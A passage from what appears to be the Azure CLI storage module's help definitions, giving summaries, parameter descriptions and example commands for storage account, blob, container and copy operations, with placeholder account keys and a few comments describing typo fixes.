text: az storage account or-policy rule remove -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" --rule-id "78746d86-d3b7-4397-a99c-0837e6741332"
"""
helps['storage account or-policy rule show'] = """
type: command
short-summary: Show the properties of specified rule in Object Replication Service Policy.
examples:
- name: Show the properties of specified rule in Object Replication Service Policy.
text: az storage account or-policy rule show -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" --rule-id "78746d86-d3b7-4397-a99c-0837e6741332"
"""
helps['storage account or-policy rule update'] = """
type: command
short-summary: Update rule properties to Object Replication Service Policy.
examples:
- name: Update rule properties to Object Replication Service Policy.
text: az storage account or-policy rule update -g ResourceGroupName -n StorageAccountName --policy-id "04344ea7-aa3c-4846-bfb9-e908e32d3bf8" --rule-id "78746d86-d3b7-4397-a99c-0837e6741332" --prefix-match blobA blobB
"""
helps['storage account private-endpoint-connection'] = """
type: group
short-summary: Manage storage account private endpoint connection.
"""
helps['storage account private-endpoint-connection approve'] = """
type: command
short-summary: Approve a private endpoint connection request for storage account.
examples:
- name: Approve a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection approve --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Approve a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection approve --id $id
- name: Approve a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection approve -g myRg --account-name mystorageaccount --name myconnection
- name: Approve a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection approve -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-endpoint-connection delete'] = """
type: command
short-summary: Delete a private endpoint connection request for storage account.
examples:
- name: Delete a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection delete --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Delete a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection delete --id $id
- name: Delete a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection delete -g myRg --account-name mystorageaccount --name myconnection
- name: Delete a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection delete -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-endpoint-connection reject'] = """
type: command
short-summary: Reject a private endpoint connection request for storage account.
examples:
- name: Reject a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection reject --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Reject a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection reject --id $id
- name: Reject a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection reject -g myRg --account-name mystorageaccount --name myconnection
- name: Reject a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection reject -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-endpoint-connection show'] = """
type: command
short-summary: Show details of a private endpoint connection request for storage account.
examples:
- name: Show details of a private endpoint connection request for storage account by ID.
text: |
az storage account private-endpoint-connection show --id "/subscriptions/0000-0000-0000-0000/resourceGroups/MyResourceGroup/providers/Microsoft.Storage/storageAccounts/mystorageaccount/privateEndpointConnections/mystorageaccount.b56b5a95-0588-4f8b-b348-15db61590a6c"
- name: Show details of a private endpoint connection request for storage account by ID.
text: |
id = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].id")
az storage account private-endpoint-connection show --id $id
- name: Show details of a private endpoint connection request for storage account using account name and connection name.
text: |
az storage account private-endpoint-connection show -g myRg --account-name mystorageaccount --name myconnection
- name: Show details of a private endpoint connection request for storage account using account name and connection name.
text: |
name = (az storage account show -n mystorageaccount --query "privateEndpointConnections[0].name")
az storage account private-endpoint-connection show -g myRg --account-name mystorageaccount --name $name
"""
helps['storage account private-link-resource'] = """
type: group
short-summary: Manage storage account private link resources.
"""
helps['storage account private-link-resource list'] = """
type: command
short-summary: Get the private link resources that need to be created for a storage account.
examples:
- name: Get the private link resources that need to be created for a storage account.
text: |
az storage account private-link-resource list --account-name mystorageaccount -g MyResourceGroup
"""
helps['storage account revoke-delegation-keys'] = """
type: command
short-summary: Revoke all user delegation keys for a storage account.
examples:
- name: Revoke all user delegation keys for a storage account by resource ID.
text: az storage account revoke-delegation-keys --ids /subscriptions/{SubID}/resourceGroups/{ResourceGroup}/providers/Microsoft.Storage/storageAccounts/{StorageAccount}
- name: Revoke all user delegation keys for a storage account 'mystorageaccount' in resource group 'MyResourceGroup' in the West US region with locally redundant storage.
text: az storage account revoke-delegation-keys -n mystorageaccount -g MyResourceGroup
"""
helps['storage account show'] = """
type: command
short-summary: Show storage account properties.
examples:
- name: Show properties for a storage account by resource ID.
text: az storage account show --ids /subscriptions/{SubID}/resourceGroups/{ResourceGroup}/providers/Microsoft.Storage/storageAccounts/{StorageAccount}
- name: Show properties for a storage account using an account name and resource group.
text: az storage account show -g MyResourceGroup -n MyStorageAccount
"""
helps['storage account show-connection-string'] = """
type: command
short-summary: Get the connection string for a storage account.
examples:
- name: Get a connection string for a storage account.
text: az storage account show-connection-string -g MyResourceGroup -n MyStorageAccount
- name: Get the connection string for a storage account. (autogenerated)
text: |
az storage account show-connection-string --name MyStorageAccount --resource-group MyResourceGroup --subscription MySubscription
crafted: true
"""
helps['storage account show-usage'] = """
type: command
short-summary: Show the current count and limit of the storage accounts under the subscription.
examples:
- name: Show the current count and limit of the storage accounts under the subscription. (autogenerated)
text: |
az storage account show-usage --location westus2
crafted: true
"""
helps['storage account update'] = """
type: command
short-summary: Update the properties of a storage account.
examples:
- name: Update the properties of a storage account. (autogenerated)
text: |
az storage account update --default-action Allow --name MyStorageAccount --resource-group MyResourceGroup
crafted: true
"""
helps['storage blob'] = """
type: group
short-summary: Manage object storage for unstructured data (blobs).
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
helps['storage blob copy'] = """
type: group
short-summary: Manage blob copy operations. Use `az storage blob show` to check the status of the blobs.
"""
helps['storage blob copy start'] = """
type: command
short-summary: Copies a blob asynchronously. Use `az storage blob show` to check the status of the blobs.
parameters:
- name: --source-uri -u
type: string
short-summary: >
A URL of up to 2 KB in length that specifies an Azure file or blob.
The value should be URL-encoded as it would appear in a request URI.
If the source is in another account, the source must either be public
or must be authenticated via a shared access signature. If the source
is public, no authentication is required.
Examples:
`https://myaccount.blob.core.windows.net/mycontainer/myblob`,
`https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>`,
`https://otheraccount.blob.core.windows.net/mycontainer/myblob?sastoken`
examples:
- name: Copies a blob asynchronously. Use `az storage blob show` to check the status of the blobs. (autogenerated)
text: |
az storage blob copy start --account-key 00000000 --account-name MyAccount --destination-blob MyDestinationBlob --destination-container MyDestinationContainer --source-uri https://storage.blob.core.windows.net/photos
crafted: true
- name: Copies a blob asynchronously. Use `az storage blob show` to check the status of the blobs (autogenerated)
text: |
az storage blob copy start --account-name MyAccount --destination-blob MyDestinationBlob --destination-container MyDestinationContainer --sas-token $sas --source-uri https://storage.blob.core.windows.net/photos
crafted: true
"""
# Help entry for `az storage blob copy start-batch`.
# Fixes: duplicated word "the the" in the --pattern long-summary, and the
# circular "--source-account-name ... If omitted, the source account is used"
# -> "the destination account is used" (the destination account is the only
# sensible fallback when no separate source account is named).
helps['storage blob copy start-batch'] = """
type: command
short-summary: Copy multiple blobs to a blob container. Use `az storage blob show` to check the status of the blobs.
parameters:
  - name: --destination-container -c
    type: string
    short-summary: The blob container where the selected source files or blobs will be copied to.
  - name: --pattern
    type: string
    short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
  - name: --dryrun
    type: bool
    short-summary: List the files or blobs to be uploaded. No actual data transfer will occur.
  - name: --source-account-name
    type: string
    short-summary: The source storage account from which the files or blobs are copied to the destination. If omitted, the destination account is used.
  - name: --source-account-key
    type: string
    short-summary: The account key for the source storage account.
  - name: --source-container
    type: string
    short-summary: The source container from which blobs are copied.
  - name: --source-share
    type: string
    short-summary: The source share from which files are copied.
  - name: --source-uri
    type: string
    short-summary: A URI specifying a file share or blob container from which the files or blobs are copied.
    long-summary: If the source is in another account, the source must either be public or be authenticated by using a shared access signature.
  - name: --source-sas
    type: string
    short-summary: The shared access signature for the source storage account.
examples:
  - name: Copy multiple blobs to a blob container. Use `az storage blob show` to check the status of the blobs. (autogenerated)
    text: |
        az storage blob copy start-batch --account-key 00000000 --account-name MyAccount --destination-container MyDestinationContainer --source-account-key MySourceKey --source-account-name MySourceAccount --source-container MySourceContainer
    crafted: true
"""
helps['storage blob delete'] = """
type: command
short-summary: Mark a blob or snapshot for deletion.
long-summary: >
The blob is marked for later deletion during garbage collection. In order to delete a blob, all of its snapshots must also be deleted.
Both can be removed at the same time.
examples:
- name: Delete a blob.
text: az storage blob delete -c mycontainer -n MyBlob
- name: Delete a blob using login credentials.
text: az storage blob delete -c mycontainer -n MyBlob --account-name mystorageaccount --auth-mode login
"""
# Help entry for `az storage blob delete-batch`.
# Fixes: duplicated word "the the" and misspelling "az stroage remove"
# -> "az storage remove" in the --pattern long-summary; balanced the quoting
# in the last example name ("except 'cli-2018-xx-xx.txt'").
helps['storage blob delete-batch'] = """
type: command
short-summary: Delete blobs from a blob container recursively.
parameters:
  - name: --source -s
    type: string
    short-summary: The blob container from where the files will be deleted.
    long-summary: The source can be the container URL or the container name. When the source is the container URL, the storage account name will be parsed from the URL.
  - name: --pattern
    type: string
    short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'. You can also try "az storage remove" command with --include and --exclude with azure cli >= 2.0.70 to match multiple patterns.
  - name: --dryrun
    type: bool
    short-summary: Show the summary of the operations to be taken instead of actually deleting the file(s).
    long-summary: If this is specified, it will ignore all the Precondition Arguments that include --if-modified-since and --if-unmodified-since. So the file(s) will be deleted with the command without --dryrun may be different from the result list with --dryrun flag on.
  - name: --if-match
    type: string
    short-summary: An ETag value, or the wildcard character (*). Specify this header to perform the operation only if the resource's ETag matches the value specified.
  - name: --if-none-match
    type: string
    short-summary: An ETag value, or the wildcard character (*).
    long-summary: Specify this header to perform the operation only if the resource's ETag does not match the value specified. Specify the wildcard character (*) to perform the operation only if the resource does not exist, and fail the operation if it does exist.
examples:
  - name: Delete all blobs ending with ".py" in a container that have not been modified for 10 days.
    text: |
        date=`date -d "10 days ago" '+%Y-%m-%dT%H:%MZ'`
        az storage blob delete-batch -s mycontainer --account-name mystorageaccount --pattern *.py --if-unmodified-since $date --auth-mode login
  - name: Delete all the blobs in a directory named "dir" in a container named "mycontainer".
    text: |
        az storage blob delete-batch -s mycontainer --pattern dir/*
  - name: Delete the blobs with the format 'cli-2018-xx-xx.txt' or 'cli-2019-xx-xx.txt' in a container.
    text: |
        az storage blob delete-batch -s mycontainer --pattern cli-201[89]-??-??.txt
  - name: Delete all blobs with the format 'cli-201x-xx-xx.txt' except 'cli-2018-xx-xx.txt' and 'cli-2019-xx-xx.txt' in a container.
    text: |
        az storage blob delete-batch -s mycontainer --pattern cli-201[!89]-??-??.txt
"""
# Help entry for `az storage blob download-batch`.
# Fixes: duplicated word "the the" in the --pattern long-summary; balanced
# the quoting in the last example name ("except 'cli-2018-xx-xx.txt'").
helps['storage blob download-batch'] = """
type: command
short-summary: Download blobs from a blob container recursively.
parameters:
  - name: --source -s
    type: string
    short-summary: The blob container from where the files will be downloaded.
    long-summary: The source can be the container URL or the container name. When the source is the container URL, the storage account name will be parsed from the URL.
  - name: --destination -d
    type: string
    short-summary: The existing destination folder for this download operation.
  - name: --pattern
    type: string
    short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
  - name: --dryrun
    type: bool
    short-summary: Show the summary of the operations to be taken instead of actually downloading the file(s).
examples:
  - name: Download all blobs that end with .py
    text: |
        az storage blob download-batch -d . --pattern *.py -s mycontainer --account-name mystorageaccount --account-key 00000000
  - name: Download all blobs in a directory named "dir" from container named "mycontainer".
    text: |
        az storage blob download-batch -d . -s mycontainer --pattern dir/*
  - name: Download all blobs with the format 'cli-2018-xx-xx.txt' or 'cli-2019-xx-xx.txt' in container to current path.
    text: |
        az storage blob download-batch -d . -s mycontainer --pattern cli-201[89]-??-??.txt
  - name: Download all blobs with the format 'cli-201x-xx-xx.txt' except 'cli-2018-xx-xx.txt' and 'cli-2019-xx-xx.txt' in container to current path.
    text: |
        az storage blob download-batch -d . -s mycontainer --pattern cli-201[!89]-??-??.txt
"""
helps['storage blob exists'] = """
type: command
short-summary: Check for the existence of a blob in a container.
parameters:
- name: --name -n
short-summary: The blob name.
examples:
- name: Check for the existence of a blob in a container. (autogenerated)
text: |
az storage blob exists --account-key 00000000 --account-name MyAccount --container-name MyContainer --name MyBlob
crafted: true
"""
# Help entry for `az storage blob generate-sas`.
# Fix: example container name typo "myycontainer" -> "mycontainer" (twice).
helps['storage blob generate-sas'] = """
type: command
short-summary: Generate a shared access signature for the blob.
examples:
  - name: Generate a sas token for a blob with read-only permissions.
    text: |
        end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
        az storage blob generate-sas -c mycontainer -n MyBlob --permissions r --expiry $end --https-only
  - name: Generate a sas token for a blob with ip range specified.
    text: |
        end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
        az storage blob generate-sas -c mycontainer -n MyBlob --ip "176.134.171.0-176.134.171.255" --permissions r --expiry $end --https-only
  - name: Generate a shared access signature for the blob. (autogenerated)
    text: |
        az storage blob generate-sas --account-key 00000000 --account-name MyStorageAccount --container-name MyContainer --expiry 2018-01-01T00:00:00Z --name MyBlob --permissions r
    crafted: true
"""
# Group entry for `az storage blob incremental-copy` (page-blob incremental copy).
helps['storage blob incremental-copy'] = """
type: group
short-summary: Manage blob incremental copy operations.
"""
# Help entry for `az storage blob incremental-copy start`.
# Fix: the first example's name ("Upload all files that end with .py unless
# blob exists and has been modified since given date.") described an upload
# command, but the command text starts an incremental copy from a page-blob
# snapshot — renamed to match what the example actually runs.
helps['storage blob incremental-copy start'] = """
type: command
short-summary: Copies an incremental copy of a blob asynchronously.
long-summary: This operation returns a copy operation properties object, including a copy ID you can use to check or abort the copy operation. The Blob service copies blobs on a best-effort basis. The source blob for an incremental copy operation must be a page blob. Call get_blob_properties on the destination blob to check the status of the copy operation. The final blob will be committed when the copy completes.
parameters:
  - name: --source-uri -u
    short-summary: >
        A URL of up to 2 KB in length that specifies an Azure page blob.
        The value should be URL-encoded as it would appear in a request URI.
        The copy source must be a snapshot and include a valid SAS token or be public.
        Example:
        `https://myaccount.blob.core.windows.net/mycontainer/myblob?snapshot=<DateTime>&sastoken`
examples:
  - name: Start an incremental copy of a source page blob snapshot to a destination blob.
    text: az storage blob incremental-copy start --source-container MySourceContainer --source-blob MyBlob --source-account-name MySourceAccount --source-account-key MySourceKey --source-snapshot MySnapshot --destination-container MyDestinationContainer --destination-blob MyDestinationBlob
  - name: Copies an incremental copy of a blob asynchronously. (autogenerated)
    text: |
        az storage blob incremental-copy start --account-key 00000000 --account-name MyAccount --destination-blob MyDestinationBlob --destination-container MyDestinationContainer --source-account-key MySourceKey --source-account-name MySourceAccount --source-blob MyBlob --source-container MySourceContainer --source-snapshot MySnapshot
    crafted: true
"""
helps['storage blob lease'] = """
type: group
short-summary: Manage storage blob leases.
"""
helps['storage blob lease acquire'] = """
type: command
short-summary: Request a new lease.
examples:
- name: Request a new lease.
text: az storage blob lease acquire -b myblob -c mycontainer --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage blob lease renew'] = """
type: command
short-summary: Renew the lease.
examples:
- name: Renew the lease.
text: az storage blob lease renew -b myblob -c mycontainer --lease-id "32fe23cd-4779-4919-adb3-357e76c9b1bb" --account-name mystorageaccount --account-key 0000-0000
"""
helps['storage blob list'] = """
type: command
short-summary: List blobs in a given container.
parameters:
- name: --include
short-summary: 'Specifies additional datasets to include: (c)opy-info, (m)etadata, (s)napshots, (d)eleted-soft. Can be combined.'
examples:
- name: List all storage blobs in a container whose names start with 'foo'; will match names such as 'foo', 'foobar', and 'foo/bar'
text: az storage blob list -c MyContainer --prefix foo
"""
helps['storage blob metadata'] = """
type: group
short-summary: Manage blob metadata.
"""
helps['storage blob restore'] = """
type: command
short-summary: Restore blobs in the specified blob ranges.
examples:
- name: Restore blobs in two specified blob ranges. For examples, (container1/blob1, container2/blob2) and (container2/blob3..container2/blob4).
text: az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t 2020-02-27T03:59:59Z -r container1/blob1 container2/blob2 -r container2/blob3 container2/blob4
- name: Restore blobs in the specified blob ranges from account start to account end.
text: az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t 2020-02-27T03:59:59Z -r "" ""
- name: Restore blobs in the specified blob range.
text: |
time=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t $time -r container0/blob1 container0/blob2
- name: Restore blobs in the specified blob range without wait and query blob restore status with 'az storage account show'.
text: |
time=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
az storage blob restore --account-name mystorageaccount -g MyResourceGroup -t $time -r container0/blob1 container0/blob2 --no-wait
"""
helps['storage blob service-properties'] = """
type: group
short-summary: Manage storage blob service properties.
"""
helps['storage blob service-properties delete-policy'] = """
type: group
short-summary: Manage storage blob delete-policy service properties.
"""
# Help entry for `az storage blob service-properties delete-policy show`.
# Fix: example account name typo "mystorageccount" -> "mystorageaccount".
helps['storage blob service-properties delete-policy show'] = """
type: command
short-summary: Show the storage blob delete-policy.
examples:
  - name: Show the storage blob delete-policy. (autogenerated)
    text: |
        az storage blob service-properties delete-policy show --account-name mystorageaccount --account-key 00000000
    crafted: true
"""
# Help entry for `az storage blob service-properties delete-policy update`.
# Fix: example account name typo "mystorageccount" -> "mystorageaccount".
helps['storage blob service-properties delete-policy update'] = """
type: command
short-summary: Update the storage blob delete-policy.
examples:
  - name: Update the storage blob delete-policy. (autogenerated)
    text: |
        az storage blob service-properties delete-policy update --account-name mystorageaccount --account-key 00000000 --days-retained 7 --enable true
    crafted: true
"""
# Help entry for `az storage blob service-properties update`.
# Fix: example account name typo "mystorageccount" -> "mystorageaccount".
helps['storage blob service-properties update'] = """
type: command
short-summary: Update storage blob service properties.
examples:
  - name: Update storage blob service properties. (autogenerated)
    text: |
        az storage blob service-properties update --404-document error.html --account-name mystorageaccount --account-key 00000000 --index-document index.html --static-website true
    crafted: true
"""
helps['storage blob set-tier'] = """
type: command
short-summary: Set the block or page tiers on the blob.
parameters:
- name: --type -t
short-summary: The blob type
- name: --tier
short-summary: The tier value to set the blob to.
- name: --timeout
short-summary: The timeout parameter is expressed in seconds. This method may make multiple calls to the Azure service and the timeout will apply to each call individually.
long-summary: >
For block blob this command only supports block blob on standard storage accounts.
    For page blob, this command only supports page blobs on premium accounts.
examples:
- name: Set the block or page tiers on the blob. (autogenerated)
text: |
az storage blob set-tier --account-key 00000000 --account-name MyAccount --container-name MyContainer --name MyBlob --tier P10
crafted: true
"""
helps['storage blob show'] = """
type: command
short-summary: Get the details of a blob.
examples:
- name: Show all properties of a blob.
text: az storage blob show -c MyContainer -n MyBlob
- name: Get the details of a blob (autogenerated)
text: |
az storage blob show --account-name mystorageccount --account-key 00000000 --container-name MyContainer --name MyBlob
crafted: true
"""
helps['storage blob sync'] = """
type: command
short-summary: Sync blobs recursively to a storage blob container.
examples:
- name: Sync a single blob to a container.
text: az storage blob sync -c mycontainer -s "path/to/file" -d NewBlob
- name: Sync a directory to a container.
text: az storage blob sync -c mycontainer --account-name mystorageccount --account-key 00000000 -s "path/to/directory"
"""
helps['storage blob upload'] = """
type: command
short-summary: Upload a file to a storage blob.
long-summary: Creates a new blob from a file path, or updates the content of an existing blob with automatic chunking and progress notifications.
parameters:
- name: --type -t
short-summary: Defaults to 'page' for *.vhd files, or 'block' otherwise.
- name: --maxsize-condition
short-summary: The max length in bytes permitted for an append blob.
- name: --validate-content
short-summary: Specifies that an MD5 hash shall be calculated for each chunk of the blob and verified by the service when the chunk has arrived.
- name: --tier
short-summary: A page blob tier value to set the blob to. The tier correlates to the size of the blob and number of allowed IOPS. This is only applicable to page blobs on premium storage accounts.
examples:
- name: Upload to a blob.
text: az storage blob upload -f /path/to/file -c MyContainer -n MyBlob
- name: Upload a file to a storage blob. (autogenerated)
text: |
az storage blob upload --account-name mystorageaccount --account-key 0000-0000 --container-name mycontainer --file /path/to/file --name myblob
crafted: true
"""
helps['storage blob upload-batch'] = """
type: command
short-summary: Upload files from a local directory to a blob container.
parameters:
- name: --source -s
type: string
short-summary: The directory where the files to be uploaded are located.
- name: --destination -d
type: string
short-summary: The blob container where the files will be uploaded.
long-summary: The destination can be the container URL or the container name. When the destination is the container URL, the storage account name will be parsed from the URL.
- name: --pattern
type: string
short-summary: The pattern used for globbing files or blobs in the source. The supported patterns are '*', '?', '[seq]', and '[!seq]'. For more information, please refer to https://docs.python.org/3.7/library/fnmatch.html.
    long-summary: When you use '*' in --pattern, it will match any character including the directory separator '/'.
- name: --dryrun
type: bool
short-summary: Show the summary of the operations to be taken instead of actually uploading the file(s).
- name: --if-match
type: string
short-summary: An ETag value, or the wildcard character (*). Specify this header to perform the operation only if the resource's ETag matches the value specified.
- name: --if-none-match
type: string
short-summary: An ETag value, or the wildcard character (*).
long-summary: Specify this header to perform the operation only if the resource's ETag does not match the value specified. Specify the wildcard character (*) to perform the operation only if the resource does not exist, and fail the operation if it does exist.
- name: --validate-content
short-summary: Specifies that an MD5 hash shall be calculated for each chunk of the blob and verified by the service when the chunk has arrived.
- name: --type -t
short-summary: Defaults to 'page' for *.vhd files, or 'block' otherwise. The setting will override blob types for every file.
- name: --maxsize-condition
short-summary: The max length in bytes permitted for an append blob.
- name: --lease-id
short-summary: The active lease id for the blob
examples:
- name: Upload all files that end with .py unless blob exists and has been modified since given date.
text: |
az storage blob upload-batch -d mycontainer --account-name mystorageaccount --account-key 00000000 -s <path-to-directory> --pattern *.py --if-unmodified-since 2018-08-27T20:51Z
- name: Upload all files from local path directory to a container named "mycontainer".
text: |
az storage blob upload-batch -d mycontainer -s <path-to-directory>
- name: Upload all files with the format 'cli-2018-xx-xx.txt' or 'cli-2019-xx-xx.txt' in local path directory.
text: |
az storage blob upload-batch -d mycontainer -s <path-to-directory> --pattern cli-201[89]-??-??.txt
- name: Upload all files with the format 'cli-201x-xx-xx.txt' except cli-2018-xx-xx.txt' and 'cli-2019-xx-xx.txt' in a container.
text: |
az storage blob upload-batch -d mycontainer -s <path-to-directory> --pattern cli-201[!89]-??-??.txt
"""
helps['storage blob url'] = """
type: command
short-summary: Create the url to access a blob.
examples:
- name: Create the url to access a blob (autogenerated)
text: |
az storage blob url --connection-string $connectionString --container-name container1 --name blob1
crafted: true
- name: Create the url to access a blob (autogenerated)
text: |
az storage blob url --account-name storageacct --account-key 00000000 --container-name container1 --name blob1
crafted: true
"""
helps['storage container'] = """
type: group
short-summary: Manage blob storage containers.
long-summary: >
Please specify one of the following authentication parameters for your commands: --auth-mode, --account-key,
--connection-string, --sas-token. You also can use corresponding environment variables to store your authentication
credentials, e.g. AZURE_STORAGE_KEY, AZURE_STORAGE_CONNECTION_STRING and AZURE_STORAGE_SAS_TOKEN.
"""
helps['storage container create'] = """
type: command
short-summary: Create a container in a storage account.
long-summary: >
By default, container data is private ("off") to the account owner. Use "blob" to allow public read access for blobs.
Use "container" to allow public read and list access to the entire container.
You can configure the --public-access using `az storage container set-permission -n CONTAINER_NAME --public-access blob/container/off`.
examples:
- name: Create a storage container in a storage account.
text: az storage container create -n MyStorageContainer
- name: Create a storage container in a storage account and return an error if the container already exists.
text: az storage container create -n MyStorageContainer --fail-on-exist
- name: Create a storage container in a storage account and allow public read access for blobs.
text: az storage container create -n MyStorageContainer --public-access blob
"""
helps['storage container delete'] = """
type: command
short-summary: Marks the specified container for deletion.
long-summary: >
The container and any blobs contained within it are later deleted during garbage collection.
examples:
- name: Marks the specified container for deletion. (autogenerated)
text: |
az storage container delete --account-key 00000000 --account-name MyAccount --name MyContainer
crafted: true
"""
helps['storage container exists'] = """
type: command
short-summary: Check for the existence of a storage container.
examples:
- name: Check for the existence of a storage container. (autogenerated)
text: |
az storage container exists --account-name mystorageccount --account-key 00000000 --name mycontainer
crafted: true
"""
helps['storage container generate-sas'] = """
type: command
short-summary: Generate a SAS token for a storage container.
examples:
- name: Generate a sas token for blob container and use it to upload a blob.
text: |
end=`date -u -d "30 minutes" '+%Y-%m-%dT%H:%MZ'`
sas=`az storage container generate-sas -n mycontainer --https-only --permissions dlrw --expiry $end -o tsv`
az storage blob upload -n MyBlob -c mycontainer -f file.txt --sas-token $sas
- name: Generate a shared access signature for the container (autogenerated)
text: |
az storage container generate-sas --account-key 00000000 --account-name mystorageaccount --expiry 2020-01-01 --name mycontainer --permissions dlrw
crafted: true
- name: Generate a SAS token for a storage container. (autogenerated)
text: |
az storage container generate-sas --account-name mystorageaccount --as-user --auth-mode login --expiry 2020-01-01 --name container1 --permissions dlrw
crafted: true
"""
helps['storage container immutability-policy'] = """
type: group
short-summary: Manage container immutability policies.
"""
helps['storage container lease'] = """
type: group
short-summary: Manage blob storage container leases.
"""
helps['storage container legal-hold'] = """
type: group
short-summary: Manage container legal holds.
"""
helps['storage container legal-hold show'] = """
type: command
short-summary: Get the legal hold properties of a container.
examples:
- name: Get the legal hold properties of a container. (autogenerated)
text: |
az storage container legal-hold show --account-name mystorageccount --container-name MyContainer
crafted: true
"""
helps['storage container list'] = """
type: command
short-summary: List containers in a storage account.
"""
helps['storage container metadata'] = """
type: group
short-summary: Manage container metadata.
"""
helps['storage container policy'] = """
type: group
short-summary: Manage container stored access policies.
"""
helps['storage copy'] = """
type: command
short-summary: Copy files or directories to or from Azure storage.
examples:
- name: Upload a single file to Azure Blob using url.
text: az storage copy -s /path/to/file.txt -d https://[account].blob.core.windows.net/[container]/[path/to/blob]
- name: Upload a single file to Azure Blob using account name and container name.
text: az storage copy --source-local-path /path/to/file.txt --destination-account-name mystorageaccount --destination-container mycontainer
- name: Upload a single file to Azure Blob with MD5 hash of the file content and save it as the blob's Content-MD5 property.
text: az storage copy -s /path/to/file.txt -d https://[account].blob.core.windows.net/[container]/[path/to/blob] --put-md5
- name: Upload an entire directory to Azure Blob using url.
text: az storage copy -s /path/to/dir -d https://[account].blob.core.windows.net/[container]/[path/to/directory] --recursive
- name: Upload an entire directory to Azure Blob using account name and container name.
text: az storage copy --source-local-path /path/to/dir --destination-account-name mystorageaccount --destination-container mycontainer --recursive
- name: Upload a set of files to Azure Blob using wildcards with url.
text: az storage copy -s /path/*foo/*bar/*.pdf -d https://[account].blob.core.windows.net/[container]/[path/to/directory]
- name: Upload a set of files to Azure Blob using wildcards with account name and container name.
text: az storage copy --source-local-path /path/*foo/*bar/*.pdf --destination-account-name mystorageaccount --destination-container mycontainer
- name: Upload files and directories to Azure Blob using wildcards with url.
text: az storage copy -s /path/*foo/*bar* -d https://[account].blob.core.windows.net/[container]/[path/to/directory] --recursive
- name: Upload files and directories to Azure Blob using wildcards with account name and container name.
text: az storage copy --source-local-path /path/*foo/*bar* --destination-account-name mystorageaccount --destination-container mycontainer --recursive
- name: Download a single file from Azure Blob using url, and you can also specify your storage account and container information as above.
text: az storage copy -s https://[account].blob.core.windows.net/[container]/[path/to/blob] -d /path/to/file.txt
- name: Download an entire directory from Azure Blob, and you can also specify your storage account and container information as above.
text: az storage copy -s https://[account].blob.core.windows.net/[container]/[path/to/directory] -d /path/to/dir --recursive
- name: Download a subset of containers within a storage account by using a wildcard symbol (*) in the container name, and you can also specify your storage account and container information as above.
text: az storage copy -s https://[account].blob.core.windows.net/[container*name] -d /path/to/dir --recursive
- name: Download a subset of files from Azure Blob. (Only jpg files and file names don't start with test will be included.)
text: az storage copy -s https://[account].blob.core.windows.net/[container] --include-pattern "*.jpg" --exclude-pattern test* -d /path/to/dir --recursive
- name: Copy a single blob to another blob, and you can also specify the storage account and container information of source and destination as above.
text: az storage copy -s https://[srcaccount].blob.core.windows.net/[container]/[path/to/blob] -d https://[destaccount].blob.core.windows.net/[container]/[path/to/blob]
